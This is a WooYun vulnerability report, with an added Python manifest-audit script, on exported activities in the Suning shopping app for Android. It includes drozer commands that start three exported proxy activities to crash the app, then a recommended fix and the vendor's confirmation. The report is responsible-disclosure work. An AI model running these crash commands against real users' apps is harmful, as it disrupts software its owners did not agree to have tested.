WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-06-04: Details sent to the vendor, awaiting vendor handling
2015-06-05: Vendor confirmed; details disclosed to the vendor only
2015-06-08: Details opened to third-party security partners
2015-07-30: Details opened to core white hats and experts in related fields
2015-08-09: Details opened to regular white hats
2015-08-19: Details opened to intern white hats
2015-09-03: Details disclosed to the public
As the title says.
Screenshots first:
Exported activities:
dz> run app.activity.info -a com.suning.mobile.ebuy
Package: com.suning.mobile.ebuy
  com.suning.mobile.ebuy.wxapi.WXEntryActivity
  com.suning.mobile.ebuy.goodsdetail.ui.CargoDetailActivity
  com.suning.mobile.ebuy.host.initial.InitialActivty
  com.unionpay.upomp.bypay.activity.SplashActivity
  com.suning.mobile.paysdk.ui.CashierPrepareActivity
  com.tencent.tauth.AuthActivity
  com.suning.dl.ebuy.dynamicload.SuningDLProxyActivity
  com.suning.dl.ebuy.dynamicload.SuningDLProxySingleTaskActivity
  com.suning.dl.ebuy.dynamicload.SuningDLProxyFragmentActivity
The client's activities:
com.suning.dl.ebuy.dynamicload.SuningDLProxyActivity
com.suning.dl.ebuy.dynamicload.SuningDLProxySingleTaskActivity
com.suning.dl.ebuy.dynamicload.SuningDLProxyFragmentActivity
are exported; sending an Intent to start them makes the running client crash and exit. Verification commands:
dz> run app.activity.start --component com.suning.mobile.ebuy com.suning.dl.ebuy.dynamicload.SuningDLProxyFragmentActivity
dz> run app.activity.start --component com.suning.mobile.ebuy com.suning.dl.ebuy.dynamicload.SuningDLProxySingleTaskActivity
dz> run app.activity.start --component com.suning.mobile.ebuy com.suning.dl.ebuy.dynamicload.SuningDLProxyActivity
Set android:exported to false for these activities, or add a try-catch in the code to handle the exception.
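As an added example (not part of the original report), the check below reproduces offline what the drozer output above reports: it reads an AndroidManifest.xml and lists activities reachable from other apps, applying Android's rule that a component is exported when android:exported="true" or when it declares an intent-filter and omits the attribute. The manifest is constructed for the example and the package and activity names in it are placeholders, not the real app's.

```python
# Added example: audit an AndroidManifest.xml for activities that other apps
# can start, the same class of finding drozer's app.activity.info reports.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name):
    # Attributes in the manifest live in the android: namespace.
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def exported_activities(manifest_xml: str) -> list:
    """Return activities reachable from outside the app, with the reason.

    An activity is exported when android:exported="true", or when it has an
    <intent-filter> and omits android:exported (the implicit default before
    targetSdk 31). A declared android:permission is reported because it gates
    the component but does not make it private.
    """
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    findings = []
    for act in root.iter("activity"):
        name = _attr(act, "name") or ""
        if name.startswith("."):           # shorthand relative to the package
            name = package + name
        exported = _attr(act, "exported")
        has_filter = act.find("intent-filter") is not None
        if exported == "true":
            reason = 'android:exported="true"'
        elif exported is None and has_filter:
            reason = "intent-filter present and android:exported omitted"
        else:
            continue                         # private: exported="false" or no filter
        findings.append({"name": name, "reason": reason,
                         "permission": _attr(act, "permission")})
    return findings


# Constructed sample manifest (placeholder names, not the real app's manifest).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.shop">
  <application>
    <activity android:name=".MainActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <activity android:name=".dynamicload.ProxyActivity" android:exported="true"/>
    <activity android:name=".dynamicload.ProxySingleTaskActivity" android:exported="false"/>
    <activity android:name=".InternalActivity"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for f in exported_activities(SAMPLE_MANIFEST):
        print(f["name"], "-", f["reason"])
```

Each activity the script lists is one that a crafted Intent can reach, so it is where the report's fix (exported="false" or defensive handling of unexpected input) needs to be applied.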
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-06-05 17:54
Thanks for the submission. The vulnerability appears to exist; a 200 yuan gift card will follow shortly.
None yet.